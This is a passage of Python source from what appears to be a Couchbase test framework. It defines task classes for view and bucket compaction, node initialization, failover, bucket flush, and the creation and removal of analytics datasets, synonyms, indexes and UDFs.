rest = RestConnection(server_info)
status = False
try:
status, content = rest.set_view_info(bucket, design_doc_name)
except Exception as e:
infra_log.error(e)
if "Error occured reading set_view _info" in str(
e) and with_rebalance:
infra_log.warning("Node {0} {1} not ready yet?: {2}"
.format(node.id, node.port, e.message))
else:
raise e
if status:
info.append(content)
return info
@staticmethod
def calc_ddoc_fragmentation(rest, design_doc_name, bucket="default",
with_rebalance=False):
total_disk_size = 0
total_data_size = 0
total_fragmentation = 0
nodes_ddoc_info = \
MonitorViewFragmentationTask.aggregate_ddoc_info(rest,
design_doc_name,
bucket,
with_rebalance)
total_disk_size = sum(
[content['disk_size'] for content in nodes_ddoc_info])
total_data_size = sum(
[content['data_size'] for content in nodes_ddoc_info])
if total_disk_size > 0 and total_data_size > 0:
total_fragmentation = \
(total_disk_size - total_data_size) / float(
total_disk_size) * 100
return total_fragmentation
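# Minimal sketch (not part of the original suite) of the fragmentation formula
# used by calc_ddoc_fragmentation above: disk and data sizes are summed across
# the per-node set_view stats and fragmentation is the wasted fraction of the
# on-disk size, expressed as a percentage.
def _example_fragmentation_percent(total_disk_size, total_data_size):
    if total_disk_size <= 0 or total_data_size <= 0:
        return 0
    return (total_disk_size - total_data_size) / float(total_disk_size) * 100
# e.g. _example_fragmentation_percent(200, 150) -> 25.0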
class ViewCompactionTask(Task):
"""
    Executes view compaction for a given design doc. This is technically
    view compaction as represented by the API, and also because the
    fragmentation is generated by the keys emitted by the map/reduce
    functions within the views. The task checks that the compaction
    history for the design doc is incremented and whether any work was
    actually done.
"""
def __init__(self, server, design_doc_name, bucket="default",
with_rebalance=False):
Task.__init__(self, "view_compaction_task")
self.server = server
self.bucket = bucket
self.design_doc_name = design_doc_name
self.ddoc_id = "_design%2f" + design_doc_name
self.compaction_revision = 0
self.precompacted_fragmentation = 0
self.with_rebalance = with_rebalance
self.rest = RestConnection(self.server)
self.result = False
def call(self):
try:
self.compaction_revision, self.precompacted_fragmentation = \
self._get_compaction_details()
self.test_log.debug(
"{0}: stats compaction before triggering it: ({1},{2})"
.format(self.design_doc_name,
self.compaction_revision,
self.precompacted_fragmentation))
if self.precompacted_fragmentation == 0:
self.test_log.warning(
"%s: There is nothing to compact, fragmentation is 0"
% self.design_doc_name)
self.set_result(False)
return
self.rest.ddoc_compaction(self.ddoc_id, self.bucket)
self.check()
except (CompactViewFailed, SetViewInfoNotFound) as ex:
self.result = False
self.set_exception(ex)
# catch and set all unexpected exceptions
except Exception as e:
self.result = False
self.set_exception(e)
    # verify compaction history incremented and some defragmentation occurred
def check(self):
try:
_compaction_running = self._is_compacting()
new_compaction_revision, fragmentation = self._get_compaction_details()
self.test_log.debug(
"{0}: stats compaction:revision and fragmentation: ({1},{2})"
.format(self.design_doc_name,
new_compaction_revision,
fragmentation))
if new_compaction_revision == self.compaction_revision and _compaction_running:
                # compaction was triggered but the revision has not changed
                # yet; perhaps compaction is still running
self.test_log.debug("design doc {0} is compacting"
.format(self.design_doc_name))
self.check()
elif new_compaction_revision > self.compaction_revision or \
self.precompacted_fragmentation > fragmentation:
self.test_log.info(
"{1}: compactor was run, compaction revision was changed on {0}"
.format(new_compaction_revision,
self.design_doc_name))
frag_val_diff = fragmentation - self.precompacted_fragmentation
self.test_log.info("%s: fragmentation went from %d to %d"
% (self.design_doc_name,
self.precompacted_fragmentation,
fragmentation))
if frag_val_diff > 0:
                    # fragmentation did not decrease even though compaction
                    # ran; perhaps compaction is still in progress
if self._is_compacting():
self.check()
self.test_log.warning(
"Compaction completed, but fragmentation value {0} "
"is more than before compaction {1}"
.format(fragmentation,
self.precompacted_fragmentation))
# Probably we already compacted, so nothing to do here
self.set_result(self.with_rebalance)
else:
self.set_result(True)
else:
for i in xrange(20):
self.test_log.debug("Wait for compaction to start")
sleep(2)
if self._is_compacting():
self.check()
else:
new_compaction_revision, fragmentation = \
self._get_compaction_details()
self.test_log.info("{2}: stats compaction: ({0},{1})"
.format(new_compaction_revision,
fragmentation,
self.design_doc_name))
                        # in case of rebalance with concurrent updates
                        # it is possible that the compaction value has
                        # not changed significantly
if new_compaction_revision > self.compaction_revision \
and self.with_rebalance:
self.test_log.info("Compaction revision increased")
self.set_result(True)
return
else:
continue
# print details in case of failure
self.test_log.info("design doc {0} is compacting:{1}"
.format(self.design_doc_name,
self._is_compacting()))
new_compaction_revision, fragmentation = self._get_compaction_details()
self.test_log.error("Stats compaction still: ({0},{1})"
.format(new_compaction_revision,
fragmentation))
status, content = self.rest.set_view_info(self.bucket,
self.design_doc_name)
stats = content["stats"]
self.test_log.warn("General compaction stats:{0}"
.format(stats))
self.set_exception(
"Check system logs, looks like compaction failed to start")
except SetViewInfoNotFound as ex:
self.result = False
self.set_exception(ex)
# catch and set all unexpected exceptions
except Exception as e:
self.result = False
self.set_exception(e)
def _get_compaction_details(self):
status, content = self.rest.set_view_info(self.bucket,
self.design_doc_name)
curr_no_of_compactions = content["stats"]["compactions"]
        curr_ddoc_fragmentation = \
            MonitorViewFragmentationTask.calc_ddoc_fragmentation(
                self.rest, self.design_doc_name, self.bucket,
                self.with_rebalance)
        return (curr_no_of_compactions, curr_ddoc_fragmentation)
def _is_compacting(self):
status, content = self.rest.set_view_info(self.bucket,
self.design_doc_name)
return content["compact_running"] == True
class CompactBucketTask(Task):
def __init__(self, server, bucket, timeout=300):
Task.__init__(self, "CompactionTask_%s" % bucket.name)
self.server = server
self.bucket = bucket
self.progress = 0
self.timeout = timeout
self.rest = RestConnection(server)
self.retries = 20
self.statuses = dict()
# get the current count of compactions
nodes = self.rest.get_nodes()
self.compaction_count = dict()
for node in nodes:
self.compaction_count[node.ip] = 0
def call(self):
self.start_task()
status = BucketHelper(self.server).compact_bucket(self.bucket.name)
if status is False:
while self.retries != 0:
sleep(60, "Wait before next compaction call", log_type="infra")
status = BucketHelper(self.server).compact_bucket(self.bucket.name)
if status is True:
self.set_result(True)
break
self.set_result(False)
self.retries -= 1
else:
self.set_result(True)
if self.result is True:
stop_time = time.time() + self.timeout
while time.time() < stop_time:
if self.timeout > 0 and time.time() > stop_time:
self.set_exception("API to check compaction status timed out in"
"%s seconds" % self.timeout)
break
status, self.progress = \
self.rest.check_compaction_status(self.bucket.name)
if self.progress > 0:
self.test_log.debug("Compaction started for %s"
% self.bucket.name)
break
sleep(2, "Wait before next check compaction call", log_type="infra")
stop_time = time.time() + self.timeout
while time.time() < stop_time:
if self.timeout > 0 and time.time() > stop_time:
self.set_exception("Compaction timed out to complete with "
"%s seconds" % self.timeout)
status, self.progress = \
self.rest.check_compaction_status(self.bucket.name)
if status is True:
self.test_log.debug("%s compaction done: %s%%"
% (self.bucket.name, self.progress))
if status is False:
self.progress = 100
self.test_log.debug("Compaction completed for %s"
% self.bucket.name)
self.test_log.info("%s compaction done: %s%%"
% (self.bucket.name, self.progress))
break
sleep(5, "Wait before next check compaction call", log_type="infra")
else:
self.test_log.error("Compaction failed to complete within "
"%s retries" % self.retries)
self.complete_task()
class MonitorBucketCompaction(Task):
"""
    Monitors bucket compaction status from start to completion.
    (An illustrative usage sketch follows this class.)
"""
def __init__(self, cluster, bucket, timeout=300):
"""
:param cluster: Couchbase cluster object
:param bucket: Bucket object
:param timeout: Timeout value in seconds
"""
super(MonitorBucketCompaction, self).__init__("CompactionTask_%s"
% bucket.name)
self.bucket = bucket
self.cluster = cluster
self.status = "NOT_STARTED"
self.progress = 0
self.timeout = timeout
self.rest = RestConnection(self.cluster.master)
def call(self):
self.start_task()
start_time = time.time()
stop_time = start_time + self.timeout
# Wait for compaction to start
while self.status != "RUNNING":
now = time.time()
if self.timeout > 0 and now > stop_time:
self.set_exception("Compaction start timed out")
break
status, self.progress = \
self.rest.check_compaction_status(self.bucket.name)
if status is True:
self.status = "RUNNING"
self.test_log.info("Compaction started for %s"
% self.bucket.name)
self.test_log.debug("%s compaction done: %s%%"
% (self.bucket.name, self.progress))
start_time = time.time()
stop_time = start_time + self.timeout
# Wait for compaction to complete
while self.status == "RUNNING" and self.status != "COMPLETED":
now = time.time()
if self.timeout > 0 and now > stop_time:
self.set_exception("Compaction timed out to complete with "
"%s seconds" % self.timeout)
break
status, self.progress = \
self.rest.check_compaction_status(self.bucket.name)
if status is False:
self.progress = 100
self.status = "COMPLETED"
self.test_log.info("Compaction completed for %s"
% self.bucket.name)
self.test_log.debug("%s compaction done: %s%%"
% (self.bucket.name, self.progress))
self.complete_task()
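# Illustrative usage sketch (not part of the original suite). `cluster`,
# `bucket` and `task_manager` are assumed to be the cluster, bucket and
# task-manager objects used elsewhere in this file.
def _example_monitor_bucket_compaction(cluster, bucket, task_manager):
    # Track a bucket compaction from NOT_STARTED through RUNNING to
    # COMPLETED, failing the task if either phase exceeds the timeout.
    compaction_task = MonitorBucketCompaction(cluster, bucket, timeout=300)
    task_manager.add_new_task(compaction_task)
    task_manager.get_task_result(compaction_task)
    return compaction_task.status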
class CBASQueryExecuteTask(Task):
def __init__(self, cluster, cbas_util, cbas_endpoint, statement):
super(CBASQueryExecuteTask, self).__init__("Cbas_query_task: %s"
% statement)
self.cluster = cluster
self.cbas_util = cbas_util
self.cbas_endpoint = cbas_endpoint
self.statement = statement
def call(self):
self.start_task()
try:
response, metrics, errors, results, handle = \
self.cbas_util.execute_statement_on_cbas_util(
self.cluster, self.statement)
if response:
self.set_result(True)
self.actual_result = results
else:
self.test_log.error("Error during CBAS query: %s" % errors)
self.set_result(False)
except Exception as e:
self.log.error("CBASQueryExecuteTask EXCEPTION: " + e)
self.set_result(False)
self.set_exception(e)
self.complete_task()
class NodeInitializeTask(Task):
def __init__(self, server, task_manager, disabled_consistent_view=None,
rebalanceIndexWaitingDisabled=None,
rebalanceIndexPausingDisabled=None,
maxParallelIndexers=None,
maxParallelReplicaIndexers=None,
port=None, quota_percent=None,
index_quota_percent=None,
fts_quota_percent=None,
cbas_quota_percent=None,
services=None, gsi_type='forestdb'):
Task.__init__(self, "node_init_task_%s_%s" %
(server.ip, server.port))
self.server = server
self.port = port or server.port
self.index_quota_percent = index_quota_percent
self.fts_quota_percent = fts_quota_percent
self.cbas_quota_percent = cbas_quota_percent
self.quota_percent = quota_percent
self.disable_consistent_view = disabled_consistent_view
self.rebalanceIndexWaitingDisabled = rebalanceIndexWaitingDisabled
self.rebalanceIndexPausingDisabled = rebalanceIndexPausingDisabled
self.maxParallelIndexers = maxParallelIndexers
self.maxParallelReplicaIndexers = maxParallelReplicaIndexers
self.services = services
self.gsi_type = gsi_type
def call(self):
self.start_task()
rest = None
service_quota = dict()
try:
rest = RestConnection(self.server)
except ServerUnavailableException as error:
self.set_exception(error)
# Change timeout back to 10 after https://issues.couchbase.com/browse/MB-40670 is resolved
info = Task.wait_until(lambda: rest.get_nodes_self(),
lambda x: x.memoryTotal > 0, 30)
self.test_log.debug("server: %s, nodes/self: %s", self.server,
info.__dict__)
username = self.server.rest_username
password = self.server.rest_password
if int(info.port) in range(9091, 9991):
self.set_result(True)
return
total_memory = int(info.mcdMemoryReserved - 100)
if self.quota_percent:
total_memory = int(total_memory * self.quota_percent / 100)
set_services = copy.deepcopy(self.services)
if set_services is None:
set_services = ["kv"]
if "index" in set_services:
if self.index_quota_percent:
index_memory = total_memory * self.index_quota_percent / 100
else:
index_memory = INDEX_QUOTA
self.test_log.debug("Quota for index service will be %s MB"
% index_memory)
total_memory -= index_memory
service_quota[CbServer.Settings.INDEX_MEM_QUOTA] = index_memory
if "fts" in set_services:
if self.fts_quota_percent:
fts_memory = total_memory * self.fts_quota_percent / 100
else:
fts_memory = FTS_QUOTA
self.test_log.debug("Quota for fts service will be %s MB"
% fts_memory)
total_memory -= fts_memory
service_quota[CbServer.Settings.FTS_MEM_QUOTA] = fts_memory
if "cbas" in set_services:
if self.cbas_quota_percent:
cbas_memory = total_memory * self.cbas_quota_percent / 100
else:
cbas_memory = CBAS_QUOTA
self.test_log.debug("Quota for cbas service will be %s MB"
% cbas_memory)
total_memory -= cbas_memory
service_quota[CbServer.Settings.CBAS_MEM_QUOTA] = cbas_memory
if total_memory < MIN_KV_QUOTA:
raise Exception("KV RAM needs to be more than %s MB"
" at node %s" % (MIN_KV_QUOTA, self.server.ip))
service_quota[CbServer.Settings.KV_MEM_QUOTA] = total_memory
rest.set_service_mem_quota(service_quota)
rest.set_indexer_storage_mode(username, password, self.gsi_type)
if self.services:
status = rest.init_node_services(
username=username,
password=password,
port=self.port,
hostname=self.server.ip,
services=self.services)
if not status:
self.set_exception(
Exception('unable to set services for server %s'
% self.server.ip))
if self.disable_consistent_view is not None:
rest.set_reb_cons_view(self.disable_consistent_view)
if self.rebalanceIndexWaitingDisabled is not None:
rest.set_reb_index_waiting(self.rebalanceIndexWaitingDisabled)
if self.rebalanceIndexPausingDisabled is not None:
rest.set_rebalance_index_pausing(
self.rebalanceIndexPausingDisabled)
if self.maxParallelIndexers is not None:
rest.set_max_parallel_indexers(self.maxParallelIndexers)
if self.maxParallelReplicaIndexers is not None:
rest.set_max_parallel_replica_indexers(
self.maxParallelReplicaIndexers)
rest.init_cluster(username, password, self.port)
self.server.port = self.port
try:
rest = RestConnection(self.server)
except ServerUnavailableException as error:
self.set_exception(error)
info = rest.get_nodes_self()
if info is None:
self.set_exception(
Exception(
                    'unable to get information on server %s; is it available?'
% self.server.ip))
self.set_result(total_memory)
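# Worked example of the quota arithmetic in NodeInitializeTask.call() above
# (added for clarity; the numbers are illustrative, not from the original file):
# with mcdMemoryReserved=2148 MB, quota_percent=50 and services=["kv", "index"],
#   total_memory = int(2148 - 100)        -> 2048 MB
#   total_memory = int(2048 * 50 / 100)   -> 1024 MB
#   index quota  = INDEX_QUOTA (since no index_quota_percent was given)
#   kv quota     = 1024 MB - index quota, which must still be at least
#                  MIN_KV_QUOTA or the task raises an exception.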
class FailoverTask(Task):
def __init__(self, servers, to_failover=[], wait_for_pending=0,
graceful=False, use_hostnames=False, allow_unsafe=False,
all_at_once=False):
Task.__init__(self, "failover_task")
self.servers = servers
self.to_failover = to_failover
self.graceful = graceful
self.wait_for_pending = wait_for_pending
self.use_hostnames = use_hostnames
self.allow_unsafe = allow_unsafe
self.all_at_once = all_at_once
def call(self):
self.start_task()
try:
self._failover_nodes()
self.test_log.debug(
"{0} seconds sleep after failover for nodes to go pending...."
.format(self.wait_for_pending))
sleep(self.wait_for_pending)
self.set_result(True)
self.complete_task()
except (FailoverFailedException, Exception) as e:
self.set_result(False)
self.set_exception(e)
def _failover_nodes(self):
rest = RestConnection(self.servers[0])
# call REST fail_over for the nodes to be failed over all at once
if self.all_at_once:
otp_nodes = list()
for server in self.to_failover:
for node in rest.node_statuses():
if (
server.hostname if self.use_hostnames else server.ip) == node.ip and int(
server.port) == int(node.port):
otp_nodes.append(node.id)
self.test_log.debug(
"Failing over {0} with graceful={1}"
.format(otp_nodes, self.graceful))
result = rest.fail_over(otp_nodes, self.graceful,
self.allow_unsafe, self.all_at_once)
if not result:
self.set_exception("Node failover failed!!")
else:
# call REST fail_over for the nodes to be failed over one by one
for server in self.to_failover:
for node in rest.node_statuses():
if (
server.hostname if self.use_hostnames else server.ip) == node.ip and int(
server.port) == int(node.port):
self.test_log.debug(
"Failing over {0}:{1} with graceful={2}"
.format(node.ip, node.port, self.graceful))
result = rest.fail_over(node.id, self.graceful,
self.allow_unsafe)
if not result:
self.set_exception("Node failover failed!!")
rest.monitorRebalance()
class BucketFlushTask(Task):
def __init__(self, server, task_manager, bucket="default", timeout=300):
Task.__init__(self, "bucket_flush_task", task_manager)
self.server = server
self.bucket = bucket
if isinstance(bucket, Bucket):
self.bucket = bucket.name
self.timeout = timeout
def call(self):
self.start_task()
try:
rest = BucketHelper(self.server)
if rest.flush_bucket(self.bucket):
if MemcachedHelper.wait_for_vbuckets_ready_state(
self.server, self.bucket,
timeout_in_seconds=self.timeout):
self.set_result(True)
else:
self.test_log.error(
"Unable to reach bucket {0} on server {1} after flush"
.format(self.bucket, self.server))
self.set_result(False)
else:
self.set_result(False)
self.complete_task()
except (BucketFlushFailed, Exception) as e:
self.set_result(False)
self.set_exception(e)
class CreateDatasetsTask(Task):
def __init__(self, cluster, bucket_util, cbas_util, cbas_name_cardinality=1,
kv_name_cardinality=1, remote_datasets=False,
creation_methods=None, ds_per_collection=1,
ds_per_dv=None):
super(CreateDatasetsTask, self).__init__(
"CreateDatasetsOnAllCollectionsTask")
self.cluster = cluster
self.bucket_util = bucket_util
self.cbas_name_cardinality = cbas_name_cardinality
self.kv_name_cardinality = kv_name_cardinality
self.remote_datasets = remote_datasets
self.ds_per_collection = ds_per_collection if ds_per_collection >= 1 \
else 1
if not creation_methods:
self.creation_methods = ["cbas_collection", "cbas_dataset",
"enable_cbas_from_kv"]
else:
self.creation_methods = creation_methods
if self.ds_per_collection > 1:
self.creation_methods = list(filter(lambda method: method !=
'enable_cbas_from_kv',
self.creation_methods))
self.cbas_util = cbas_util
self.ds_per_dv = ds_per_dv
if remote_datasets:
self.remote_link_objs = self.cbas_util.list_all_link_objs(
"couchbase")
self.creation_methods.remove("enable_cbas_from_kv")
self.created_datasets = []
def call(self):
self.start_task()
try:
for bucket in self.cluster.buckets:
if self.kv_name_cardinality > 1:
for scope in self.bucket_util.get_active_scopes(bucket):
for collection in \
self.bucket_util.get_active_collections(
bucket, scope.name):
self.init_dataset_creation(
bucket, scope, collection)
else:
scope = self.bucket_util.get_scope_obj(bucket, "_default")
self.init_dataset_creation(
bucket, scope, self.bucket_util.get_collection_obj(
scope, "_default"))
self.set_result(True)
self.complete_task()
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
return self.result
def dataset_present(self, dataset_name, dataverse_name):
names_present = list(filter(
lambda ds: ds.name == dataset_name and
ds.dataverse_name == dataverse_name,
self.created_datasets))
if names_present:
return True
return False
def init_dataset_creation(self, bucket, scope, collection):
for _ in range(self.ds_per_collection):
creation_method = random.choice(self.creation_methods)
dataverse = None
if self.remote_datasets:
link_name = random.choice(self.remote_link_objs).full_name
else:
link_name = None
name = self.cbas_util.generate_name(
name_cardinality=1, max_length=3, fixed_length=True)
if creation_method == "enable_cbas_from_kv":
enabled_from_KV = True
if bucket.name + "." + scope.name in \
self.cbas_util.dataverses.keys():
dataverse = self.cbas_util.dataverses[
bucket.name + "." + scope.name]
else:
dataverse = Dataverse(bucket.name + "." + scope.name)
name = CBASHelper.format_name(collection.name)
else:
enabled_from_KV = False
dataverses = list(
filter(lambda dv: (self.ds_per_dv is None) or (len(
dv.datasets.keys()) < self.ds_per_dv),
self.cbas_util.dataverses.values()))
if dataverses:
dataverse = random.choice(dataverses)
if self.cbas_name_cardinality > 1 and not dataverse:
dataverse = Dataverse(self.cbas_util.generate_name(
self.cbas_name_cardinality - 1, max_length=3,
fixed_length=True))
elif not dataverse:
dataverse = self.cbas_util.get_dataverse_obj("Default")
while self.dataset_present(name, dataverse.name):
name = self.cbas_util.generate_name(
name_cardinality=1, max_length=3, fixed_length=True)
num_of_items = collection.num_items
if creation_method == "cbas_collection":
dataset_obj = CBAS_Collection(
name=name, dataverse_name=dataverse.name, link_name=link_name,
dataset_source="internal", dataset_properties={},
bucket=bucket, scope=scope, collection=collection,
enabled_from_KV=enabled_from_KV, num_of_items=num_of_items)
else:
dataset_obj = Dataset(
name=name, dataverse_name=dataverse.name,
dataset_source="internal", dataset_properties={},
bucket=bucket, scope=scope, collection=collection,
enabled_from_KV=enabled_from_KV, num_of_items=num_of_items,
link_name=link_name)
if not self.create_dataset(dataset_obj):
raise N1QLQueryException(
"Could not create dataset " + dataset_obj.name + " on " +
dataset_obj.dataverse_name)
self.created_datasets.append(dataset_obj)
if dataverse.name not in self.cbas_util.dataverses.keys():
self.cbas_util.dataverses[dataverse.name] = dataverse
self.cbas_util.dataverses[dataverse.name].datasets[
self.created_datasets[-1].full_name] = self.created_datasets[-1]
def create_dataset(self, dataset):
dataverse_name = str(dataset.dataverse_name)
if dataverse_name == "Default":
dataverse_name = None
if dataset.enabled_from_KV:
if self.kv_name_cardinality > 1:
return self.cbas_util.enable_analytics_from_KV(
self.cluster, dataset.full_kv_entity_name, False, False,
None, None, None, 120, 120)
else:
return self.cbas_util.enable_analytics_from_KV(
self.cluster, dataset.get_fully_qualified_kv_entity_name(1),
False, False, None, None, None, 120, 120)
else:
if isinstance(dataset, CBAS_Collection):
analytics_collection = True
elif isinstance(dataset, Dataset):
analytics_collection = False
if self.kv_name_cardinality > 1 and self.cbas_name_cardinality > 1:
return self.cbas_util.create_dataset(
self.cluster, dataset.name, dataset.full_kv_entity_name,
dataverse_name, False, False, None, dataset.link_name, None,
False, None, None, None, 120, 120, analytics_collection)
elif self.kv_name_cardinality > 1 and \
self.cbas_name_cardinality == 1:
return self.cbas_util.create_dataset(
self.cluster, dataset.name, dataset.full_kv_entity_name,
None, False, False, None, dataset.link_name, None, False,
None, None, None, 120, 120, analytics_collection)
elif self.kv_name_cardinality == 1 and \
self.cbas_name_cardinality > 1:
return self.cbas_util.create_dataset(
self.cluster, dataset.name,
dataset.get_fully_qualified_kv_entity_name(1),
dataverse_name, False, False, None, dataset.link_name, None,
False, None, None, None, 120, 120, analytics_collection)
else:
return self.cbas_util.create_dataset(
self.cluster, dataset.name,
dataset.get_fully_qualified_kv_entity_name(1),
None, False, False, None, dataset.link_name, None, False,
None, None, None, 120, 120, analytics_collection)
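# Note added for clarity (not in the original file): create_dataset() above
# picks the KV source name and the target dataverse from the two cardinality
# settings. With kv_name_cardinality > 1 the dataset is sourced from the fully
# qualified `bucket.scope.collection` name, otherwise from the bucket-level
# name; with cbas_name_cardinality > 1 an explicit dataverse name is passed,
# otherwise none is passed and the active/Default dataverse is used.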
class CreateSynonymsTask(Task):
def __init__(self, cluster, cbas_util, cbas_entity, dataverse,
synonyms_per_entity=1, synonym_on_synonym=False, prefix=None):
super(CreateSynonymsTask, self).__init__("CreateSynonymsTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.cbas_entity = cbas_entity
self.dataverse = dataverse
self.synonyms_per_entity = synonyms_per_entity
self.synonym_on_synonym = synonym_on_synonym
self.prefix = prefix
def call(self):
self.start_task()
results = []
try:
for _ in range(self.synonyms_per_entity):
name = self.cbas_util.generate_name(
name_cardinality=1, max_length=3, fixed_length=True)
while name in \
self.cbas_util.dataverses[
self.dataverse.name].synonyms.keys():
name = self.cbas_util.generate_name(
name_cardinality=1, max_length=3, fixed_length=True)
synonym = Synonym(
name=name, cbas_entity_name=self.cbas_entity.name,
cbas_entity_dataverse=self.cbas_entity.dataverse_name,
dataverse_name=self.dataverse.name,
synonym_on_synonym=self.synonym_on_synonym)
if not self.cbas_util.create_analytics_synonym(
self.cluster, synonym.full_name,
synonym.cbas_entity_full_name, if_not_exists=False,
validate_error_msg=False, expected_error=None, username=None,
password=None, timeout=300, analytics_timeout=300):
results.append(False)
else:
self.cbas_util.dataverses[self.cbas_entity.dataverse_name].\
synonyms[synonym.name] = synonym
results.append(True)
if not all(results):
raise Exception(
"Failed to create all the synonyms on " + \
self.cbas_entity.name)
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class CreateCBASIndexesTask(Task):
def __init__(self, cluster, cbas_util, dataset, indexes_per_dataset=1,
prefix=None, index_fields=[]):
super(CreateCBASIndexesTask, self).__init__(
"CreateCBASIndexesTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.indexes_per_dataset = indexes_per_dataset
self.prefix = prefix
if not index_fields:
index_fields = ["name:STRING", "age:BIGINT", "body:STRING",
"mutation_type:STRING", "mutated:BIGINT"]
self.index_fields = index_fields
self.creation_methods = ["cbas_index", "index"]
self.dataset = dataset
def call(self):
self.start_task()
try:
for i in range(self.indexes_per_dataset):
name = self.cbas_util.generate_name(
name_cardinality=1, max_length=3, fixed_length=True)
index = CBAS_Index(
name=name, dataset_name=self.dataset.name,
dataverse_name=self.dataset.dataverse_name,
indexed_fields=random.choice(self.index_fields))
creation_method = random.choice(self.creation_methods)
if creation_method == "cbas_index":
index.analytics_index = True
else:
index.analytics_index = False
if not self.cbas_util.create_cbas_index(
self.cluster, index_name=index.name,
indexed_fields=index.indexed_fields,
dataset_name=index.full_dataset_name,
analytics_index=index.analytics_index,
validate_error_msg=False, expected_error=None,
username=None, password=None, timeout=300, analytics_timeout=300):
raise Exception(
"Failed to create index {0} on {1}({2})".format(
index.name, index.full_dataset_name,
str(index.indexed_fields)))
self.cbas_util.dataverses[
self.dataset.dataverse_name].datasets[
self.dataset.full_name].indexes[index.name] = index
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class CreateUDFTask(Task):
def __init__(self, cluster, cbas_util, udf, dataverse, body, referenced_entities=[],
parameters=[]):
super(CreateUDFTask, self).__init__("CreateUDFTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.dataverse = dataverse
self.body = body
self.udf = udf
self.referenced_entities = referenced_entities
self.parameters = parameters
def call(self):
self.start_task()
try:
if not self.cbas_util.create_udf(
self.cluster, name=self.udf, dataverse=self.dataverse.name,
or_replace=False, parameters=self.parameters, body=self.body,
if_not_exists=False, query_context=False, use_statement=False,
validate_error_msg=False, expected_error=None, username=None,
password=None, timeout=120, analytics_timeout=120):
raise Exception(
"Couldn't create UDF {0} on dataverse {1}: def :{2}".format(
self.udf, self.dataverse.name, self.body))
udf_obj = CBAS_UDF(
name=self.udf, dataverse_name=self.dataverse.name, parameters=[],
body=self.body, referenced_entities=self.referenced_entities)
self.cbas_util.dataverses[
self.dataverse.name].udfs[udf_obj.full_name] = udf_obj
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class DropUDFTask(Task):
def __init__(self, cluster, cbas_util, dataverse):
super(DropUDFTask, self).__init__("DropUDFTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.dataverse = dataverse
def call(self):
self.start_task()
try:
for udf in self.dataverse.udfs.values():
if not self.cbas_util.drop_udf(
self.cluster, name=udf.name, dataverse=self.dataverse.name,
parameters=udf.parameters, if_exists=False,
use_statement=False, query_context=False,
validate_error_msg=False, expected_error=None, username=None,
password=None, timeout=120, analytics_timeout=120):
raise Exception("Could not drop {0} on {1}: def :".format(
udf.name, self.dataverse.name, udf.body))
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class DropCBASIndexesTask(Task):
def __init__(self, cluster, cbas_util, dataset):
super(DropCBASIndexesTask, self).__init__("DropCBASIndexesTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.dataset = dataset
def call(self):
self.start_task()
try:
            for index in list(self.dataset.indexes.values()):  # copy; entries are popped below
if not self.cbas_util.drop_cbas_index(
self.cluster, index_name=index.name,
dataset_name=index.full_dataset_name,
analytics_index=index.analytics_index,
timeout=120, analytics_timeout=120):
raise Exception("Failed to drop index {0} on {1}".format(
index.name, index.full_dataset_name))
self.cbas_util.dataverses[
self.dataset.dataverse_name].datasets[
self.dataset.full_name].indexes.pop(index.name)
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class DropSynonymsTask(Task):
def __init__(self, cluster, cbas_util):
super(DropSynonymsTask, self).__init__("DropSynonymsTask")
self.cluster = cluster
self.cbas_util = cbas_util
def call(self):
self.start_task()
try:
for dv_name, dataverse in self.cbas_util.dataverses.items():
                for synonym in list(dataverse.synonyms.values()):  # copy; entries are popped below
if not self.cbas_util.drop_analytics_synonym(
self.cluster, synonym_full_name=synonym.full_name,
if_exists=True, timeout=120, analytics_timeout=120):
raise Exception(
"Unable to drop synonym " + synonym.full_name)
self.cbas_util.dataverses[dataverse.name].synonyms.pop(
synonym.name, None)
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class DropDatasetsTask(Task):
def __init__(self, cluster, cbas_util, kv_name_cardinality=1):
super(DropDatasetsTask, self).__init__(
"DropDatasetsTask")
self.cluster = cluster
self.cbas_util = cbas_util
self.kv_name_cardinality = kv_name_cardinality
def call(self):
self.start_task()
try:
for dv_name, dataverse in self.cbas_util.dataverses.items():
                for ds_name, dataset in list(dataverse.datasets.items()):  # copy; entries are popped below
if dataset.enabled_from_KV:
if self.kv_name_cardinality > 1:
if not self.cbas_util.disable_analytics_from_KV(
self.cluster, dataset.full_kv_entity_name):
raise Exception(
"Unable to disable analytics on " + \
dataset.full_kv_entity_name)
else:
if not self.cbas_util.disable_analytics_from_KV(
self.cluster,
dataset.get_fully_qualified_kv_entity_name(1)):
raise Exception(
"Unable to disable analytics on " + \
dataset.get_fully_qualified_kv_entity_name(
1))
else:
if not self.cbas_util.drop_dataset(
self.cluster, dataset.full_name):
raise Exception(
"Unable to drop dataset " + dataset.full_name)
dataverse.datasets.pop(dataset.full_name)
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class DropDataversesTask(Task):
def __init__(self, cluster, cbas_util):
super(DropDataversesTask, self).__init__(
"DropDataversesTask")
self.cbas_util = cbas_util
self.cluster = cluster
def call(self):
self.start_task()
try:
for dataverse in self.cbas_util.dataverses.values():
if dataverse.name != "Default":
if not self.cbas_util.drop_dataverse(
self.cluster, dataverse.name):
raise Exception(
"Unable to drop dataverse " + dataverse.name)
except Exception as e:
self.set_exception(e)
return
self.complete_task()
class ExecuteQueryTask(Task):
def __init__(self, server, query, contentType='application/x-www-form-urlencoded',
connection='keep-alive', isIndexerQuery=False, bucket=None, indexName=None, timeout=300):
super(ExecuteQueryTask, self).__init__("ExecuteQueriesTask_%sstarted%s"
% (query, time.time()))
self.server = server
self.query = query
self.timeout = timeout
self.contentType = contentType
self.connection = connection
self.isIndexerQuery = isIndexerQuery
        self.rest = RestConnection(server)
        self.bucket = bucket
        self.index_name = indexName
def call(self):
self.start_task()
try:
indexer_rest = GsiHelper(self.server, self.log)
self.log.info("starting call")
status, content, header = indexer_rest.execute_query(server=self.server, query=self.query,
contentType=self.contentType,
connection=self.connection, isIndexerQuery=self.isIndexerQuery)
newContent = json.loads(content)
self.log.info("Content is:"+str(newContent))
self.set_result(status)
